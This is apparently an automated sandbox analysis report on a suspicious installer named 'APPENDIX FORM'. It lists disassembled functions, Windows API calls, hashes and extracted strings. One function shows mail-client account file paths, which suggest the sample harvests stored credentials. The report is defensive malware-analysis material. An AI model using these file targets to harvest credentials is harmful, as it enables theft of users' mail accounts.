                                                                                                              • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                              • Instruction ID: 995e421c5028273f0f698f78e21c9e8b829da10dad05f2ccd26f80b27bb6ad3b
                                                                                                              • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                              • Instruction Fuzzy Hash: 6A117F73D40B2CEAEA60AFB0DDC5FCB7B9D9F04700F408825B6D97A852DA28B5146751
                                                                                                              Function 00402BDC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • DestroyWindow.USER32(?,00000000), ref: 00402BF4
                                                                                                              • GetTickCount.KERNEL32 ref: 00402C12
                                                                                                              • wsprintfA.USER32 ref: 00402C40
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              • CreateDialogParamA.USER32(0000006F,00000000,00402B44,00000000), ref: 00402C64
                                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00402C72
                                                                                                                • Part of subcall function 00402BC0: MulDiv.KERNEL32(?,00000064,?), ref: 00402BD5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                              • String ID: ... %d%%
                                                                                                              • API String ID: 722711167-2449383134
                                                                                                              • Opcode ID: f2267b28db3a5fe3cb10dbc160883a1cbec363296c6093f2343f828124788bd0
                                                                                                              • Instruction ID: d07fb7ba5d8a9df6441e3fcaec0217ab1422bd56783a7a7703193e57ef262099
                                                                                                              • Opcode Fuzzy Hash: f2267b28db3a5fe3cb10dbc160883a1cbec363296c6093f2343f828124788bd0
                                                                                                              • Instruction Fuzzy Hash: C901C870946210ABE721AF64AF0DFAE7778A7017057044237F601B11E0C6B8E541D69E
                                                                                                              Function 00404896 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004048B1
                                                                                                              • GetMessagePos.USER32 ref: 004048B9
                                                                                                              • ScreenToClient.USER32(?,?), ref: 004048D3
                                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 004048E5
                                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040490B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$Send$ClientScreen
                                                                                                              • String ID: f
                                                                                                              • API String ID: 41195575-1993550816
                                                                                                              • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                              • Instruction ID: db44c4f697662905fd107a60ff49d2a7fca4051012713ef620924bffaa5b50c0
                                                                                                              • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                                                                                              • Instruction Fuzzy Hash: 97014C75D00218BAEB01DBA4DC85BFFBBBCAB55711F10412BBB10B62D0C7B4A9418BA5
                                                                                                              Function 00402B44 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402B5F
                                                                                                              • wsprintfA.USER32 ref: 00402B93
                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BA3
                                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                              • Opcode ID: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                                                                              • Instruction ID: 3f5ce1fcf3cb01a0fa9ccaf83f12fe0bb2d46f1b1d5dc84fd7777e7c50a39ee5
                                                                                                              • Opcode Fuzzy Hash: eb69263b85c0967037015140e31ace042ee7bd246636b1be7c2271423c491acf
                                                                                                              • Instruction Fuzzy Hash: D5F01270900109BBDF205F60CD0ABAE3779AB00345F00803AFA16B52D1D7F86A558B99
                                                                                                              Function 333E8821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,333E6FFD,00000000,?,?,?,333E8A72,?,?,00000100), ref: 333E887B
                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,333E8A72,?,?,00000100,5EFC4D8B,?,?), ref: 333E8901
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 333E89FB
                                                                                                              • __freea.LIBCMT ref: 333E8A08
                                                                                                                • Part of subcall function 333E56D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 333E5702
                                                                                                              • __freea.LIBCMT ref: 333E8A11
                                                                                                              • __freea.LIBCMT ref: 333E8A36
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1414292761-0
                                                                                                              • Opcode ID: 014591b6d04cd15371b9ece0ec5838426b041c2985a7385cd1bf955924309b95
                                                                                                              • Instruction ID: b927f1013664f633fa0ee7e5701455952ceca887ee451b9b771237398459ec06
                                                                                                              • Opcode Fuzzy Hash: 014591b6d04cd15371b9ece0ec5838426b041c2985a7385cd1bf955924309b95
                                                                                                              • Instruction Fuzzy Hash: D451B4B3E10326AFEB158E64CC80FAB77A9EF44B56F558629FC04DA140EB35DC5086D1
                                                                                                              Function 333E15DA Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _strlen.LIBCMT ref: 333E1607
                                                                                                              • _strcat.LIBCMT ref: 333E161D
                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,333E190E,?,?,00000000,?,00000000), ref: 333E1643
                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,?,333E190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 333E165A
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,333E190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 333E1661
                                                                                                              • lstrcatW.KERNEL32(00001008,?,?,?,?,?,333E190E,?,?,00000000,?,00000000,?,?,?,00000104), ref: 333E1686
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrcatlstrlen$_strcat_strlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 1922816806-0
                                                                                                              • Opcode ID: 561f9c76f310eedb334243844ac74dfd2fdad186787866f171634d30de7238bb
                                                                                                              • Instruction ID: e12a4f18200aa4f226b170a04a155af31e613241f22ba86246f00d72aec2a0f8
                                                                                                              • Opcode Fuzzy Hash: 561f9c76f310eedb334243844ac74dfd2fdad186787866f171634d30de7238bb
                                                                                                              • Instruction Fuzzy Hash: 7021B837D00314ABD7059F54ECC1EEEB7B8EF48710F14C41AE504EB141DB74A98187A5
                                                                                                              Function 333E1000 Relevance: 9.1, APIs: 6, Instructions: 76stringCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrcatW.KERNEL32(?,?,?,?,?,00000000), ref: 333E1038
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 333E104B
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,00000000), ref: 333E1061
                                                                                                              • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 333E1075
                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000000), ref: 333E1090
                                                                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 333E10B8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$AttributesFilelstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 3594823470-0
                                                                                                              • Opcode ID: 54bd72e7ff3d614ae894d1e07af5cec20323244d0c09dcc277f1d55891d3754f
                                                                                                              • Instruction ID: f5391b6fab49c908267672190ab52dc61c40d365a58bc551f12bda846e639f30
                                                                                                              • Opcode Fuzzy Hash: 54bd72e7ff3d614ae894d1e07af5cec20323244d0c09dcc277f1d55891d3754f
                                                                                                              • Instruction Fuzzy Hash: 11218177D003289BCF20DE61DC88EDB776DEF84325F148696E859971A1DE349E86CB80
                                                                                                              Function 333E3856 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,333E3518,333E23F1,333E1F17), ref: 333E3864
                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 333E3872
                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 333E388B
                                                                                                              • SetLastError.KERNEL32(00000000,?,333E3518,333E23F1,333E1F17), ref: 333E38DD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 3852720340-0
                                                                                                              • Opcode ID: 4cb3b8c0672cd7c41ca43470aa61276cd1eae9dffe63f956333d890c7cfc1783
                                                                                                              • Instruction ID: a7a7dbbefede902d6120aacd49d6e77ee9e3e91ac5f24d0c223244330cb9d197
                                                                                                              • Opcode Fuzzy Hash: 4cb3b8c0672cd7c41ca43470aa61276cd1eae9dffe63f956333d890c7cfc1783
                                                                                                              • Instruction Fuzzy Hash: 8401F737E4C7339EF2142D79ACC49162BDCDF46776B60D23AE021A95D0EF16880A934B
                                                                                                              Function 333E5AF6 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,333E6C6C), ref: 333E5AFA
                                                                                                              • _free.LIBCMT ref: 333E5B2D
                                                                                                              • _free.LIBCMT ref: 333E5B55
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,333E6C6C), ref: 333E5B62
                                                                                                              • SetLastError.KERNEL32(00000000,?,?,333E6C6C), ref: 333E5B6E
                                                                                                              • _abort.LIBCMT ref: 333E5B74
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 3160817290-0
                                                                                                              • Opcode ID: 73fd6633333a25068ae923be44b73d1fe97e3180f15dcec99b55a6b01cee91c2
                                                                                                              • Instruction ID: cee47e5423b3a4b8a33980a34dd9d643c479ec33a814465ce275c54baff29368
                                                                                                              • Opcode Fuzzy Hash: 73fd6633333a25068ae923be44b73d1fe97e3180f15dcec99b55a6b01cee91c2
                                                                                                              • Instruction Fuzzy Hash: 70F0283BD94732ABF2023E34AC84E5F27AD8FC25B2B28C024F825A6180FE65C8034164
                                                                                                              Function 333E11EA Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 333E1E89: lstrlenW.KERNEL32(?,?,?,?,?,333E10DF,?,?,?,00000000), ref: 333E1E9A
                                                                                                                • Part of subcall function 333E1E89: lstrcatW.KERNEL32(?,?,?,333E10DF,?,?,?,00000000), ref: 333E1EAC
                                                                                                                • Part of subcall function 333E1E89: lstrlenW.KERNEL32(?,?,333E10DF,?,?,?,00000000), ref: 333E1EB3
                                                                                                                • Part of subcall function 333E1E89: lstrlenW.KERNEL32(?,?,333E10DF,?,?,?,00000000), ref: 333E1EC8
                                                                                                                • Part of subcall function 333E1E89: lstrcatW.KERNEL32(?,333E10DF,?,333E10DF,?,?,?,00000000), ref: 333E1ED3
                                                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 333E122A
                                                                                                                • Part of subcall function 333E173A: _strlen.LIBCMT ref: 333E1855
                                                                                                                • Part of subcall function 333E173A: _strlen.LIBCMT ref: 333E1869
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: lstrlen$_strlenlstrcat$AttributesFile
                                                                                                              • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                                                                                                              • API String ID: 4036392271-1520055953
                                                                                                              • Opcode ID: 4b2bfe38fc186e03de6e910a41ad8c4a6348af2edaa78c3cc394e28a860af702
                                                                                                              • Instruction ID: 3d259796d6dc0a5be6d96d4537161fe750c0102c971915ecc6b285f8894720e7
                                                                                                              • Opcode Fuzzy Hash: 4b2bfe38fc186e03de6e910a41ad8c4a6348af2edaa78c3cc394e28a860af702
                                                                                                              • Instruction Fuzzy Hash: 5121A57AE50318AAEB109BA0ECC1FEEB339EF80715F404556F605EB1D0E6B15D818759
                                                                                                              Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(00000000,?,000000F0), ref: 00401F93
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00401FA3
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,?,000000F0), ref: 0040201D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                              • String ID: `7B
                                                                                                              • API String ID: 2987980305-3208876730
                                                                                                              • Opcode ID: 2422ef51a1b6823f9c659da9030c5864fce0ccc280c30660f8fbdbd249992362
                                                                                                              • Instruction ID: 4f0a164b3c96300c60f35f0977c0e3ddcb7ae723504d3d42d940096a5cee0e9b
                                                                                                              • Opcode Fuzzy Hash: 2422ef51a1b6823f9c659da9030c5864fce0ccc280c30660f8fbdbd249992362
                                                                                                              • Instruction Fuzzy Hash: CA21EB72D04215FACF207FA48E4DA6E79B0AB4435CF20423BF601B62E0D7BD4942DA5E
                                                                                                              Function 00405F4B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,00429000,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FA3
                                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405FB0
                                                                                                              • CharNextA.USER32(?,00429000,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FB5
                                                                                                              • CharPrevA.USER32(?,?,0042A400,0042A400,00000000,004031F1,0042A400,771B3410,004033CB), ref: 00405FC5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Char$Next$Prev
                                                                                                              • String ID: *?|<>/":
                                                                                                              • API String ID: 589700163-165019052
                                                                                                              • Opcode ID: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                                                                              • Instruction ID: b0dad545636566696c56c87c00777fa542562a183f3785fc597fb34056e0d2ab
                                                                                                              • Opcode Fuzzy Hash: 629f8b76d7fa33355aab091ca9466ab0ab0c1990dabb568f1c5d9d4edaa7ed44
                                                                                                              • Instruction Fuzzy Hash: 08110161808B9269FB3216340C44B7BBF99CF5A760F28007BE9C0732C2D77C5C429A6D
                                                                                                              Function 333E4B39 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,333E4AEA,?,?,333E4A8A,?,333F2238,0000000C,333E4BBD,00000000,00000000), ref: 333E4B59
                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 333E4B6C
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,333E4AEA,?,?,333E4A8A,?,333F2238,0000000C,333E4BBD,00000000,00000000,?,333E2082), ref: 333E4B8F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                              • Opcode ID: de3de40eb95751297d314b59a5f158927c93f28dbfe5c2b109a88dea1ebb324e
                                                                                                              • Instruction ID: 4976263695ef09b4c867f7d84da87d274761e09b891ed0753ca644b2ab18800f
                                                                                                              • Opcode Fuzzy Hash: de3de40eb95751297d314b59a5f158927c93f28dbfe5c2b109a88dea1ebb324e
                                                                                                              • Instruction Fuzzy Hash: 01F0A436910119BFCB11AF50CC08FAE7FFDEF09351F448154F805A6140DB358A42CB50
                                                                                                              Function 0040173F Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • lstrcatA.KERNEL32(00000000,00000000,004093B0,00429800,00000000,00000000,00000031), ref: 0040177E
                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,004093B0,004093B0,00000000,00000000,004093B0,00429800,00000000,00000000,00000031), ref: 004017A8
                                                                                                                • Part of subcall function 00405CE0: lstrcpynA.KERNEL32(?,?,00000400,00403289,00422EE0,NSIS Error), ref: 00405CED
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000,?), ref: 00405004
                                                                                                                • Part of subcall function 00404FCB: lstrlenA.KERNEL32(00402C53,0041F4C0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C53,00000000), ref: 00405014
                                                                                                                • Part of subcall function 00404FCB: lstrcatA.KERNEL32(0041F4C0,00402C53,00402C53,0041F4C0,00000000,00000000,00000000), ref: 00405027
                                                                                                                • Part of subcall function 00404FCB: SetWindowTextA.USER32(0041F4C0,0041F4C0), ref: 00405039
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040505F
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405079
                                                                                                                • Part of subcall function 00404FCB: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405087
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.2598614165.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.2598565438.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598649412.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598677979.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.2598713964.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                              • String ID:
                                                                                                              • API String ID: 1941528284-0
                                                                                                              • Opcode ID: 7414090835c37b2da69ca23e027a58d56e44aace4796a00baa671bee27ff00f6
                                                                                                              • Instruction ID: dcaa159d3d65cf46b394741f05a2eb50de91680975dac2d9d0f3c2bd51607c2a
                                                                                                              • Opcode Fuzzy Hash: 7414090835c37b2da69ca23e027a58d56e44aace4796a00baa671bee27ff00f6
                                                                                                              • Instruction Fuzzy Hash: 2441C671904515BADF10BB69DC46EAF3568EF01368F20823BF121B10E1DA7C4A419A6D
